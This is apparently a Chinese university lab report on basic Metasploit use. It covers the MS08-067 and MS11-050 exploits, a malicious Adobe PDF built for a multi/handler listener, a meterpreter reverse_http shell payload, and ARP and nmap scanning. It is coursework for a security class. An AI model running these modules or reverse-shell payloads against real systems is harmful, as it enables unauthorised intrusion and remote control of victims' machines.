20145318《网络对抗》MSF基础应用
2017-04-16 22:34
246 查看
20145318 《网络对抗》 MSF基础应用
实验内容
掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块基础问题回答
exploit:通过漏洞对程序攻击的途径,是一种手段或通道。payload:具体的攻击代码
encode:伪装、隐藏
实践过程
主动攻击:MS08_067漏洞渗透攻击
开启MSF查询ms08_067漏洞
进入漏洞模块的应用,显示当前漏洞有效载荷
设置载荷,配置攻击机和靶机的IP地址参数
exploit,等待攻击成功
针对浏览器:MS11-050安全漏洞
开启msf确定相应模块名之后,我们使用该模块。使用命令
use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块
使用命令
info查看该模块的具体信息
设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令
set payloads windows/meterpreter/reverse_http
使用
show options查看具体参数设置
使用命令
exploit攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为:
针对客户端:Adobe阅读器渗透攻击
开启msf进入渗透模块应用,设置有效载荷
使用命令
exploit生成
5318.pdf
使用命令
cp 5318.pdf /root/5318.pdf将其复制到根目录下
重新进入msf平台
使用命令
use exploit/multi/handler进入监听模式,设置好参数,执行
exploit等待被攻击者的接听。
连接成功
应用辅助模块:利用nmap扫描
使用命令msfconsole开启msf
输入命令
use auxiliary/scanner/discovery/arp_sweep进入模块
用show options查看需要设置的消息
根据显示的消息进行设置,设置相关参数
使用命令run开启扫描,结果如下
使用命令nmap+ip地址(该ip地址为同网段下另一个电脑主机ip)结果如下
相关文章推荐
- 20145216史婧瑶 《网络对抗》 MSF基础应用
- 20145305 《网络对抗》MSF基础应用
- 20145308 《网络对抗》 MSF基础应用 学习总结
- 20145227鄢曼君《网络对抗》MSF基础应用
- 20145232韩文浩《网络对抗》MSF基础应用
- 20145209刘一阳《网络对抗》实验五:MSF基础应用
- 20145326蔡馨熤《网络对抗》——MSF基础应用
- 20145336张子扬《网络对抗》MSF基础应用
- 20145120黄玄曦《网络对抗》MSF基础应用
- 20145310 《网络对抗》 MSF基础应用
- 20145217《网络对抗》 MSF基础应用
- 20145219《网络对抗》MSF基础应用
- 20145210姚思羽《网络对抗》MSF基础应用实验
- 20145201李子璇 《网络对抗》MSF基础应用
- 20145302张薇 《网络对抗》MSF应用基础
- 20145231熊梓宏 《网络对抗》 实验5 MSF基础应用
- 20145309李昊《网络对抗》MSF应用基础
- 20145327 《网络对抗》MSF基础应用
- 20145338 《网络对抗》 MSF基础应用
- 20145316许心远《网络对抗》MSF基础应用